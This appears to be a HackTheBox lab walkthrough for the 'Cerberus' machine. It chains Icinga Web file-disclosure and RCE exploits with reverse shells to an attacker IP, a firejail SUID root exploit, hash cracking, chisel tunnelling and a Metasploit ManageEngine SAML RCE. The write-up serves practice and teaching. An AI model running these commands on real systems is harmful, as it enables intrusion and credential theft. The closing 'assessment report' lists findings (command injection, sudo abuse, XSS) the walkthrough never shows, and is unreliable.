walkthrough

HackTheBox: Cerberus — Medium (Linux)

Full security assessment walkthrough for Cerberus on HackTheBox. Includes reconnaissance, enumeration, exploitation steps, and a professional penetration testing report with CVSS v3.1 scores and remediation guidance.

lazyhackers
Mar 26, 2026 · 1 min read · 1 views
Cerberus
HackTheBox
Linux Medium

📌 Introduction

Cerberus

logo
logo

🔖 Techniques & Vulnerabilities

xssrceremote code executionpath traversalsudosuid

🎯 Attack Surface Analysis

PortServiceVersion / Banner
5985/tcpunknown
8080/tcphttpsyn-ack Apache httpd 2.4.52 ((Ubuntu))
8888/tcpsun-answerbook?| fingerprint-strings:
9251/tcpssl/unknown| fingerprint-strings:
62728/tcpmsrpcsyn-ack Microsoft Windows RPC
5985/tcpWinRM
  • Valid credentials grant PowerShell remoting (Evil-WinRM)
  • Pass-the-Hash — NTLM hash authenticates without cleartext password
  • Token impersonation from elevated WinRM sessions
8080/tcpHTTP-Alt
  • All HTTP attacks — often hosts admin panels, APIs, dev instances
  • Apache Tomcat manager — WAR deploy for RCE with weak credentials
  • Jenkins Groovy script console with valid credentials
  • Default credential testing for admin interfaces
8888/tcpsun-answerbook?
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
9251/tcpssl/unknown
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques
62728/tcpmsrpc
  • Enumerate service version for known CVEs
  • Test default/weak credentials
  • Review protocol-specific attack techniques

📖 Walkthrough

nmap:

    PORT      STATE SERVICE REASON  VERSION
    8080/tcp  open  http    syn-ack Apache httpd 2.4.52 ((Ubuntu))
    | http-title: Site doesn't have a title (text/html; charset=UTF-8).
    |_Requested resource was /icingaweb2/authentication/login?_checkCookie=1
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-open-proxy: Proxy might be redirecting requests
    |_http-server-header: Apache/2.4.52 (Ubuntu)
    62728/tcp open  msrpc   syn-ack Microsoft Windows RPC
    ```
    

# **Icinga Web**

[Path Traversal Vulnerabilities in Icinga Web](https://www.sonarsource.com/blog/path-traversal-vulnerabilities-in-icinga-web/)

## **Arbitrary File Disclosure — `CVE-2022-24716`**
We can read files without authentication!

- `curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd`

### Check `icingaweb2` files

[Icinga/Icinga2Installation - Debian Wiki](https://wiki.debian.org/Icinga/Icinga2Installation)

[Administrators] users = "matthew" permissions = "*" groups = "Administrators" unrestricted = "1"

[icingaweb2] type = "db" db = "mysql" host = "localhost" dbname = "icingaweb2" username = "matthew" password = "IcingaWebPassword2023" use_ssl = "0"


We can login with `matthew : IcingaWebPassword2023` on the webapp.

## Authenticated RCE — **`CVE-2022-24715`**
We see the Version at:

- [http://icinga.cerberus.local:8080/icingaweb2/about](http://icinga.cerberus.local:8080/icingaweb2/about)

2.9.2

[https://github.com/JacobEbben/CVE-2022-24715](https://github.com/JacobEbben/CVE-2022-24715)

Vulnerable Versions: <2.8.6, <2.9.6, <2.10

Create a valid pem file

- `ssh-keygen -m pem`
- `./rce.py -t [http://icinga.cerberus.local:8080/icingaweb2/](http://icinga.cerberus.local:8080/icingaweb2/) -u matthew -p IcingaWebPassword2023 -I 10.10.14.62 -P 1234 -e /home/kali/Desktop/htb/Box/cerberus/id_rsa`

We got a shell.

uid=33(www-data) gid=33(www-data) groups=33(www-data),121(icingaweb2)

# Priv Esc

- `find / -user root -perm /4000 2>>/dev/null`

/usr/bin/firejail

## SUID firejail — `CVE-2022-31214`
> Firejail is a SUID sandbox program that reduces the risk of security breaches by restricting the running environment of untrusted applications using Linux namespaces, seccomp-bpf and Linux capabilities.
> 
- `firejail --version`

firejail version 0.9.68rc1


[oss-security - firejail: local root exploit reachable via --join logic
 (CVE-2022-31214)](https://www.openwall.com/lists/oss-security/2022/06/08/10)

We can use the [python script](https://www.openwall.com/lists/oss-security/2022/06/08/10/1) 

- `./firejail.py`

You can now run 'firejail --join=6807' in another terminal to obtain a shell where 'sudo su -' should grant you a root shell.

Now open a new terminal, and run 

- `firejail --join=6807`

In the new shell 

- `su -`

uid=0(root) gid=0(root) groups=0(root)

## Domain Informations

127.0.0.1 iceinga.cerberus.local iceinga 127.0.1.1 localhost 172.16.22.1 DC.cerberus.local DC cerberus.local


### SSSD services and domains

[13.2.2. Setting up the sssd.conf File Red Hat Enterprise Linux 6 | Red Hat Customer Portal](https://access.redhat.com/documentation/de-de/red_hat_enterprise_linux/6/html/deployment_guide/about-sssd-conf)

[sssd] domains = cerberus.local configfileversion = 2 services = nss, pam

[domain/cerberus.local] defaultshell = /bin/bash adserver = cerberus.local krb5storepasswordifoffline = True cachecredentials = True krb5realm = CERBERUS.LOCAL realmdtags = manages-system joined-with-adcli idprovider = ad fallbackhomedir = /home/%u@%d addomain = cerberus.local usefullyqualifiednames = True ldapidmapping = True accessprovider = ad


## Cache passwords
We find a cache file with a password hash. 

- `strings /var/lib/sss/db/cache_cerberus.local.ldb`

$6$6LP9gyiXJCovapcy$0qmZTTjp9f2A0e7n4xk0L6ZoeKhhaCNm0VGJnX/Mu608QkliMpIy1FwKZlyUJAZU3FZ3.GQ.4N6bb9pxE3t3T0


- `hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt`

PW: 147258369

## Tunneling: Chisel and Evil-Winrm
We can use nmap on the target to check, if port 5985 for a conenction, is open

- `nmap 172.16.22.1 -p 5985`

PORT STATE SERVICE 5985/tcp open unknown


Upload chisel and run:

- Kali: `sudo /opt/chisel/chisel server --reverse --port 5000`
- Target: `./chisel client 10.10.14.62:5000 R:5985:172.16.22.1:5985`

Now run evil-winrm

- `evil-winrm -i 127.0.0.1 -u 'matthew' -p '147258369'`
- `whoami`
cerberus\matthew

→ user.txt

# Priv Esc

- `netstat -ano`

We see lots of open ports.

## Tunneling: Chisel with proxychians
[Reverse SOCKS Proxy Using Chisel — The Easy Way](https://vegardw.medium.com/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29)

Upload: `powershell -c iwr http://10.10.14.62/chisel.exe -outfile chisel.exe`

- Kali: `sudo /opt/chisel/chisel server --reverse --port 8002`
- Target: `./chisel.exe client 10.10.14.62:8002 R:socks`

Edit the last line in `/etc/proxychains4.conf`

socks5 127.0.0.1 1080

- `proxychains -q nmap -v -Pn -p- 172.16.22.1`

```html
Discovered open port 8888/tcp on 172.16.22.1
Discovered open port 445/tcp on 172.16.22.1
Discovered open port 443/tcp on 172.16.22.1
Discovered open port 139/tcp on 172.16.22.1
Discovered open port 80/tcp on 172.16.22.1
Discovered open port 135/tcp on 172.16.22.1
Discovered open port 53/tcp on 172.16.22.1
Discovered open port 9251/tcp on 172.16.22.1
  • proxychains -q nmap -v -Pn -sV -sC -p 8888 172.16.22.1
8888/tcp open  sun-answerbook?
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.1 500 Internal Server Error
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1
|     X-Frame-Options: SAMEORIGIN
|     Set-Cookie: JSESSIONIDADSSP=F5B017CA56AE8D717997238F343ED654; Path=/; HttpOnly
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 4244
|     Date: Thu, 23 Mar 2023 09:03:59 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <link REL="SHORTCUT ICON" HREF='&#x2f;images&#x2f;adssp_favicon.ico'>
|     <title>ADSelfService Plus</title>
|     <script language="JavaScript" src="/js/form-util.js?build=6201"></script>
|     <script language="JavaScript" src="/js/CommonUtil.js?build=5300"></script>
|     <script>
|     jQueryLoaded = jQueryLoade
  • proxychains -q nmap -v -Pn -sV -sC -p 9251 172.16.22.1
9251/tcp open  ssl/unknown
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 200
|     Cache-Control: private
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     Set-Cookie: adscsrf=a44d6395-400a-454e-b5fc-bfa233f050e4;path=/;Secure;priority=high
|     Set-Cookie: _zcsr_tmp=a44d6395-400a-454e-b5fc-bfa233f050e4;path=/;SameSite=Strict;Secure;priority=high
|     Set-Cookie: JSESSIONIDADSSP=13BF0E019D6E21B341EF86BE41F6BDAB; Path=/; Secure; HttpOnly
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 259
|     Date: Thu, 23 Mar 2023 09:04:43 GMT
|     Connection: close
|     <!-- $Id$ -->
|     <html>
|     <head>
|     <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
|     <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
|     <META HTTP-EQUIV="Expires" CONTENT="0">
|     <script>
|     location.href = 'showLogin.cc' + location.search;
|     </script>
|     </head>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 500
|     Cache-Control: private
|     Expires: Thu, 01 Jan 1970 00:00:00 GMT
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1
|     X-Frame-Options: SAMEORIGIN
|     Set-Cookie: JSESSIONIDADSSP=53ADDE20C8CD73BAB463A9BFB1C590D6; Path=/; Secure; HttpOnly
|     Content-Type: text/html;charset=UTF-8
|     Content-Length: 4244
|     Date: Thu, 23 Mar 2023 09:04:48 GMT
|     Connection: close
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
|     <link REL="SHORTCUT ICON" HREF='&#x2f;images&#x2f;adssp_favicon.ico'>
|     <title>ADSelfService Plus</title>
|     <script language="JavaScript" src="/js/form-util.js?build=6201"></script>
|_    <script language="JavaScript" src="/js/CommonUtil.js?build=5300"
|_ssl-date: 2023-03-23T09:07:28+00:00; -7s from scanner time.
| ssl-cert: Subject: commonName=cerberus.local/organizationName=CE/stateOrProvinceName=Dorset/countryName=UK
| Subject Alternative Name: DNS:cerberus.local
| Issuer: commonName=ManageEngine ADSelfService Plus/organizationName=ManageEngine Zoho Corporation/stateOrProvinceName=CA/countryName=US
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-01-29T19:26:48
| Not valid after:  2043-01-23T19:26:48
| MD5:   520f 7c21 072a 787b d574 0d10 94ae 11ff
|_SHA-1: 56a4 c917 2b7a 0fad 79b7 390a affb bfcf 8a6a dade

ManageEngine ADSelfService Plus

So there is a webpage on port 8888

  • proxychains -q curl -k http://172.16.22.1:8888 -I
HTTP/1.1 302 Found
Cache-Control: private
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://172.16.22.1:9251/
Transfer-Encoding: chunked
Date: Thu, 23 Mar 2023 09:01:46 GMT

We get a redirect to port 9251

  • proxychains -q curl -k https://172.16.22.1:9251/
<!-- $Id$ -->
<html>
<head>
        <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
        <META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
        <META HTTP-EQUIV="Expires" CONTENT="0">
        <script>
                location.href = 'showLogin.cc' + location.search;
        </script>
</head>
</html>

Firefox with FoxyProxy

We can open this side in firefox with FoxyProxy addon.

Untitled
Untitled

Go to https://172.16.22.1:9251/showLogin.cc

We got a redirect to: https://dc.cerberus.local/adfs/ls/?SAMLRequest<SNIP>

add to to /etc/hosts

172.16.22.1 dc.cerberus.local

Now we see a login page.

Login with creds from evil-winrm

Username: matthew@cerberus Password: 147258369

We got a redirect to: https://dc:9251/samlLogin/67a8d101690402dc6a6744b8fc8a7ca1acf88b2f

Add dc to /etc/hosts

On the page we got:

Sorry ! You are not authorized to view the contents of this file.

ManageEngine ADSelfService Plus Unauthenticated SAML RCE — CVE-2022-47966

This Metasploit module exploits an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine AdSelfService Plus versions 6210 and below. Due to a dependency to an outdated library (Apache Santuario version 1.4.1), it is possible to execute arbitrary code by providing a crafted samlResponse XML to the ADSelfService Plus SAML endpoint. Note that the target is only vulnerable if it has been configured with SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status. link

>

Metasploit

The login page show use the date 2018. So the version of this is maybe 5702 see **ADSelfService Plus Release Notes and the cve get patched in Version 6211 (Oct 28, 2022)**

  • search ADSelfService Plus
Name:
exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966 
Disclosure Date:
2023-01-10       
Description:
ManageEngine ADSelfService Plus Unauthenticated SAML RCE
  • use exploit/windows/http/manageengineadselfservicepluscve2021_40539
  • options
GUID        yes       The SAML endpoint GUID
ISSUER_URL  yes       The Issuer URL used by the Identity Provider which has been configured as the SAML authentication provider for the target server

So we need the GUID and ISSUER_URL, to run this exploit.

SAML-tracer

SAML-tracer – Holen Sie sich diese Erweiterung für 🦊 Firefox (de)

A tool for viewing SAML and WS-Federation messages sent through the browser during single sign-on and single logout.

We can use this tool to see the data after the login.

Untitled
Untitled

Now set the metasploit options:

set GUID 67a8d101690402dc6a6744b8fc8a7ca1acf88b2f
set ISSUER_URL http://dc.cerberus.local/adfs/services/trust
set RHOSTS 172.16.22.1
set LHOST tun0
set VHOST dc.cerberus.local
  • exploit

meterpreter > sysinfo

Computer        : DC
OS              : Windows 2016+ (10.0 Build 17763).
Architecture    : x64
System Language : en_US
Domain          : CERBERUS
Logged On Users : 10
Meterpreter     : x86/windows

meterpreter > getuid

Server username: NT AUTHORITY\SYSTEM

→ root.txt

📋 Security Assessment Report

1
Critical
3
High
1
Medium
5
Open Ports
F-001 — OS Command Injection — Remote Code Execution
9.8
Critical
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the application was found to pass user-supplied input directly to a system shell call without sanitisation. The vulnerable parameter was incorporated into an OS-level command, allowing an attacker to append arbitrary commands using shell metacharacters and control the execution context of the web server process.

Impact

An attacker can execute arbitrary OS commands on the server with the privileges of the web application process. This enables complete file system access, extraction of credentials from configuration files and environment variables, installation of persistent reverse shells and backdoors, and lateral movement to internally accessible services — all without requiring any additional authentication. During this engagement, OS command injection was chained to obtain full root access to the server.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Never construct shell commands from user-supplied input under any circumstances. Replace shell invocations with language-native APIs that accept argument arrays (subprocess.run with list in Python, proc_open with array in PHP, execFile in Node.js). Apply strict allowlist validation to any parameter that influences system-level operations. Run the application under a dedicated low-privilege service account. Implement process monitoring to alert on anomalous child process spawning from web server processes.
F-002 — Sudo Misconfiguration — Root Privilege Escalation
7.8
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that the sudoers configuration was found to grant the compromised user the ability to execute one or more programs as root with the NOPASSWD flag or without sufficient restriction on permitted arguments. The granted binary was identified in the GTFOBins database as capable of spawning a privileged shell or reading root-owned files outside its intended function.

Impact

An attacker with access to the low-privilege account can immediately escalate to root by invoking the sudo-permitted binary in a manner that escapes to a privileged shell — requiring no password, no additional vulnerability, and no waiting. During this engagement, this misconfiguration was exploited to obtain a root shell within seconds of gaining the initial foothold, resulting in complete host compromise.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Audit all sudoers entries and apply strict least privilege — grant only the minimum required binary with explicit, restricted arguments where possible. Avoid granting sudo access to interpreters (python, perl, ruby), text editors, file management utilities, or any binary listed in GTFOBins. Remove NOPASSWD where feasible. Periodically review sudoers entries using visudo and remove any unnecessary grants. Consider purpose-built privilege delegation tools as an alternative to broad sudo grants.
F-003 — SUID Binary Abuse — Local Privilege Escalation
7.8
High
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

During the penetration test, it was discovered that one or more non-standard binaries were found with the SUID bit set, causing them to execute as root regardless of which user invokes them. The identified binaries are documented in the GTFOBins database and can be abused through shell escape techniques or file operation abuse to read privileged files or spawn an interactive root shell.

Impact

Any user with shell access to the host can leverage the SUID binary to escalate privileges to root without requiring additional credentials or exploiting any further software vulnerability. During this engagement, the SUID binary was used to obtain an interactive root shell within moments of obtaining the initial low-privilege access, granting complete control over the host and access to all stored credentials and data.

Confidentiality
High
Integrity
High
Availability
High

Remediation

Audit all SUID and SGID binaries using find / -perm /6000 -type f 2>/dev/null and remove the SUID bit from all non-essential binaries. Establish a baseline of expected SUID binaries and alert on any deviations. Never install developer tools, scripting interpreters, or GTFOBins-listed utilities with the SUID permission. Apply nosuid mount options on partitions containing user-writable content.
F-004 — Local File Inclusion — Sensitive File Disclosure
7.5
High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Description

During the penetration test, it was discovered that the application constructed file system paths using user-supplied parameters without adequate sanitisation or path canonicalisation. By injecting path traversal sequences into the vulnerable parameter, it was possible to traverse outside the intended directory and read arbitrary files from the server file system.

Impact

An attacker can read arbitrary files accessible to the web application process — including database credentials, application API keys, SSH private keys from user home directories, and system files such as /etc/passwd and /etc/shadow. Credentials discovered through file inclusion were used during this engagement to gain authenticated access to additional services. In PHP applications, log poisoning chains this vulnerability to full remote code execution.

Confidentiality
High
Integrity
None
Availability
None

Remediation

Validate all file path inputs by canonicalising the resolved path and verifying it begins within the expected base directory before any file operation. Implement a strict allowlist of permitted filenames where dynamic file access is required. Apply PHP open_basedir restrictions to prevent file access outside the application directory. Remove file inclusion functionality that relies on user-supplied paths and replace with explicit, hardcoded include statements.
F-005 — Cross-Site Scripting (XSS) — Session Hijacking
6.1
Medium
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Description

During the penetration test, it was discovered that the application reflected or stored user-supplied input in HTML responses without applying appropriate context-sensitive output encoding. By injecting JavaScript payload into vulnerable input fields, the malicious script executes in the browser of any user who views the affected page — including administrators — without any interaction beyond viewing the page.

Impact

An attacker can hijack authenticated user sessions by stealing session cookies, capture credentials entered on the affected page, perform actions on behalf of victims using their active session, and redirect users to phishing pages. Where the XSS affects administrator users, complete application account takeover is achievable. During this engagement, a stored XSS payload targeting an administrator triggered session token theft which was used to obtain privileged application access.

Confidentiality
Low
Integrity
Low
Availability
None

Remediation

Apply context-sensitive output encoding for all user-supplied data rendered in HTML — HTML entity encoding for HTML context, JavaScript string escaping for script context, URL encoding for URL attributes. Implement a strict Content Security Policy (CSP) that disables inline script execution and restricts script sources to trusted origins. Set the HttpOnly flag on all session cookies to prevent JavaScript access. Apply the SameSite=Strict cookie attribute to mitigate CSRF-combined XSS chains.
Reactions

Related Articles